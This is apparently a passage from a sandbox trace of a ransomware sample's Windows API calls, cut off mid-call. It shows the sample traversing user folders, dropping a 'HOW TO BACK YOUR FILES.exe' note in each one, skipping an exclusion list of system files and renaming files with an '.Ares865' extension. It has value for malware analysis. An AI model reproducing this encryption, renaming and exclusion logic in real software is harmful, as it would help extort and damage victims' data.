[0106.211] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e0710 [0106.212] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fc8 | out: hHeap=0x2b0000) returned 1 [0106.212] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e0828 [0106.212] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0106.214] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e0828 | out: hHeap=0x2b0000) returned 1 [0106.214] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0106.214] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e0710 | out: hHeap=0x2b0000) returned 1 [0106.214] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0106.214] CloseHandle (hObject=0x124) returned 1 [0106.214] CloseHandle (hObject=0x118) returned 1 [0106.214] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0106.214] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0106.214] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0106.214] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce60f420, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce6f3c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce6f3c60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0xa74, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wsRGB.icc", cAlternateFileName="")) returned 0 [0106.214] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0106.215] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a10 [0106.215] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0106.215] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0106.215] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0106.215] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned 228 [0106.215] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0106.215] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.215] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.216] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.216] GetLastError () returned 0x0 [0106.216] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.216] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.216] CloseHandle (hObject=0x120) returned 1 [0106.217] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.217] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.217] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4febe4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.217] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.217] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.217] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0106.217] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4febe4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.217] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.217] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0106.217] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0106.217] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0106.217] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4fee4640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4fee4640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0106.217] lstrcmpiW (lpString1="10.0", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.217] lstrcmpiW (lpString1="10.0", lpString2="aoldtz.exe") returned -1 [0106.217] lstrcmpiW (lpString1="10.0", lpString2=".") returned 1 [0106.217] lstrcmpiW (lpString1="10.0", lpString2="..") returned 1 [0106.217] lstrcmpiW (lpString1="10.0", lpString2="windows") returned -1 [0106.217] lstrcmpiW (lpString1="10.0", lpString2="bootmgr") returned -1 [0106.217] lstrcmpiW (lpString1="10.0", lpString2="temp") returned -1 [0106.217] lstrcmpiW (lpString1="10.0", lpString2="pagefile.sys") returned -1 [0106.217] lstrcmpiW (lpString1="10.0", lpString2="boot") returned -1 [0106.217] lstrcmpiW (lpString1="10.0", lpString2="ids.txt") returned -1 [0106.217] lstrcmpiW (lpString1="10.0", lpString2="ntuser.dat") returned -1 [0106.217] lstrcmpiW (lpString1="10.0", lpString2="perflogs") returned -1 [0106.217] lstrcmpiW (lpString1="10.0", lpString2="MSBuild") returned -1 [0106.217] lstrlenW (lpString="10.0") returned 4 [0106.218] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\*") returned 230 [0106.218] lstrcpyW (in: lpString1=0x2cce5ca, lpString2="10.0" | out: lpString1="10.0") returned="10.0" [0106.218] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a08 [0106.218] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1d4) returned 0x2d5ee0 [0106.218] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a10 | out: ListHead=0x2e7710, ListEntry=0x2e7a10) returned 0x2e79f0 [0106.218] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4febe4e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0106.218] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0106.218] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4febe4e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0106.218] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0106.218] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a10 [0106.218] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0106.218] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0106.218] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0106.218] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned 233 [0106.218] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0106.218] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.218] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.219] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.219] GetLastError () returned 0x0 [0106.219] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.219] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.219] CloseHandle (hObject=0x120) returned 1 [0106.219] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.219] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.219] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4fee4640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4fee4640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.219] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.219] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.220] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0106.220] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4fee4640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4fee4640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.220] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.220] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0106.220] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0106.220] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0106.220] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe952fcd0, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x892c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AdobeCMapFnt10.lst", cAlternateFileName="ADOBEC~1.LST")) returned 1 [0106.220] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.220] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="aoldtz.exe") returned -1 [0106.220] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2=".") returned 1 [0106.220] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="..") returned 1 [0106.220] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="windows") returned -1 [0106.220] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="bootmgr") returned -1 [0106.220] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="temp") returned -1 [0106.220] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="pagefile.sys") returned -1 [0106.220] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="boot") returned -1 [0106.220] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="ids.txt") returned -1 [0106.220] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="ntuser.dat") returned -1 [0106.220] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="perflogs") returned -1 [0106.220] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="MSBuild") returned -1 [0106.220] lstrlenW (lpString="AdobeCMapFnt10.lst") returned 18 [0106.220] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\*") returned 235 [0106.220] lstrcpyW (in: lpString1=0x2cce5d4, lpString2="AdobeCMapFnt10.lst" | out: lpString1="AdobeCMapFnt10.lst") returned="AdobeCMapFnt10.lst" [0106.220] lstrlenW (lpString="AdobeCMapFnt10.lst") returned 18 [0106.220] lstrlenW (lpString="Ares865") returned 7 [0106.220] lstrcmpiW (lpString1="t10.lst", lpString2="Ares865") returned 1 [0106.220] lstrlenW (lpString=".dll") returned 4 [0106.220] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2=".dll") returned 1 [0106.220] lstrlenW (lpString=".lnk") returned 4 [0106.220] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2=".lnk") returned 1 [0106.220] lstrlenW (lpString=".ini") returned 4 [0106.220] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2=".ini") returned 1 [0106.220] lstrlenW (lpString=".sys") returned 4 [0106.221] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2=".sys") returned 1 [0106.221] lstrlenW (lpString="AdobeCMapFnt10.lst") returned 18 [0106.221] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst.Ares865") returned 260 [0106.221] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst.ares865"), dwFlags=0x1) returned 0 [0106.222] GetLastError () returned 0x3 [0106.222] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst MoveFileEx error 3\r\n") returned 281 [0106.222] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst MoveFileEx error 3\r\n") returned 281 [0106.222] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0106.222] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x756e [0106.222] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x119, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x119, lpOverlapped=0x0) returned 1 [0106.223] CloseHandle (hObject=0x118) returned 1 [0106.223] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0106.223] CloseHandle (hObject=0x0) returned 0 [0106.223] CloseHandle (hObject=0x0) returned 0 [0106.223] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xd9c071a0, ftLastWriteTime.dwHighDateTime=0x1d2e625, nFileSizeHigh=0x0, nFileSizeLow=0x21cdb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AdobeSysFnt10.lst", cAlternateFileName="ADOBES~1.LST")) returned 1 [0106.223] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.223] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="aoldtz.exe") returned -1 [0106.223] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2=".") returned 1 [0106.223] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="..") returned 1 [0106.223] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="windows") returned -1 [0106.223] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="bootmgr") returned -1 [0106.223] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="temp") returned -1 [0106.223] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="pagefile.sys") returned -1 [0106.223] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="boot") returned -1 [0106.223] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="ids.txt") returned -1 [0106.224] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="ntuser.dat") returned -1 [0106.224] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="perflogs") returned -1 [0106.224] lstrcmpiW (lpString1="AdobeSysFnt10.lst", lpString2="MSBuild") returned -1 [0106.224] lstrlenW (lpString="AdobeSysFnt10.lst") returned 17 [0106.224] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst") returned 252 [0106.224] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0106.224] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79f0 [0106.224] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" [0106.224] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc760 | out: hHeap=0x2b0000) returned 1 [0106.224] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79e8 | out: hHeap=0x2b0000) returned 1 [0106.224] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned 203 [0106.224] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" [0106.224] lstrcatW (in: lpString1="", 